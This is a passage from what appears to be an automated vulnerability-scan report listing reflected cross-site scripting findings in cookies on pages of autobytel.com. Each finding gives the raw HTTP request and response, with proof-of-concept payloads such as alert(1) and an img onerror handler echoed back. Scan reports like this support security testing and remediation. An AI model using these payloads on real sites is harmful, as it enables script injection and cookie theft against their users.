Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=27f46e<img%20src%3da%20onerror%3dalert(1)>c81dcfa2ffc; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 44352
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:34:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:40 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:34:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:39 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 27f46e<img src=a onerror=alert(1)>c81dcfa2ffc cannot be converted to a number.
</h1>
...[SNIP]...

4.2040. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843c9"%3balert(1)//e157ea299fe was submitted in the BDATALIST cookie. This input was echoed as 843c9";alert(1)//e157ea299fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4843c9"%3balert(1)//e157ea299fe; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:39:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:39:49 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4843c9";alert(1)//e157ea299fe";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47F81EC9-D609-4F14-9238B82F
...[SNIP]...

4.2041. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b24b"%3balert(1)//162a2e92347 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5b24b";alert(1)//162a2e92347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5b24b"%3balert(1)//162a2e92347; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 55345
Expires: Mon, 24 Jan 2011 23:47:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:55 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";

           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5b24b";alert(1)//162a2e92347||";

           s.prop14 = "home|help|privacy : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search
...[SNIP]...

4.2042. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 47ac3<img%20src%3da%20onerror%3dalert(1)>c8905b9d6f3 was submitted in the PV_CT cookie. This input was echoed as 47ac3<img src=a onerror=alert(1)>c8905b9d6f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=247ac3<img%20src%3da%20onerror%3dalert(1)>c8905b9d6f3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 63064
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:42:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:32 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:32 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 247ac3<img src=a onerror=alert(1)>c8905b9d6f3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2043. http://www.autobytel.com/content/home/help/index.cfm/action/terms [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dc34"%3balert(1)//4bbdb493743 was submitted in the BDATALIST cookie. This input was echoed as 1dc34";alert(1)//4bbdb493743 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c41dc34"%3balert(1)//4bbdb493743; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 54707
Expires: Mon, 24 Jan 2011 23:36:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:21 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:20 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c41dc34";alert(1)//4bbdb493743";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47D851FD-E0AA-F64F-2E249AFF
...[SNIP]...

4.2044. http://www.autobytel.com/content/home/help/index.cfm/action/terms [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0310"%3balert(1)//caca1cfb7f6 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as c0310";alert(1)//caca1cfb7f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=c0310"%3balert(1)//caca1cfb7f6; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54707

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";

           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "c0310";alert(1)//caca1cfb7f6||";

           s.prop14 = "home|help|terms : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search En
...[SNIP]...

4.2045. http://www.autobytel.com/content/home/help/index.cfm/action/terms [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 60e75<img%20src%3da%20onerror%3dalert(1)>6e38586f4bb was submitted in the PV_CT cookie. This input was echoed as 60e75<img src=a onerror=alert(1)>6e38586f4bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=260e75<img%20src%3da%20onerror%3dalert(1)>6e38586f4bb; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 62426
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:37:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:09 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 260e75<img src=a onerror=alert(1)>6e38586f4bb cannot be converted to a number.
</h1>
...[SNIP]...

4.2046. http://www.autobytel.com/content/home/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 599a6"%3balert(1)//afa2457dd78 was submitted in the BDATALIST cookie. This input was echoed as 599a6";alert(1)//afa2457dd78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4599a6"%3balert(1)//afa2457dd78; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:39:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70738

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4599a6";alert(1)//afa2457dd78";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47F7A716-96F9-BACC-313F2250
...[SNIP]...

4.2047. http://www.autobytel.com/content/home/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bb2e"%3balert(1)//5a9a12890a1 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 6bb2e";alert(1)//5a9a12890a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=6bb2e"%3balert(1)//5a9a12890a1; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:50 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70726

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
               s.prop8 = "home|lsuv";

           //s.prop9 = "home|Search Engine Optimization Project|13148";
           s.prop10 = "home|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "6bb2e";alert(1)//5a9a12890a1||";

           s.prop14 = "home : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "home||||||Search Engine Op
...[SNIP]...

4.2048. http://www.autobytel.com/content/home/index.cfm [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload f9c2d<img%20src%3da%20onerror%3dalert(1)>7f9bbd4f348 was submitted in the PV_CT cookie. This input was echoed as f9c2d<img src=a onerror=alert(1)>7f9bbd4f348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2f9c2d<img%20src%3da%20onerror%3dalert(1)>7f9bbd4f348; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 78438
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:02 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
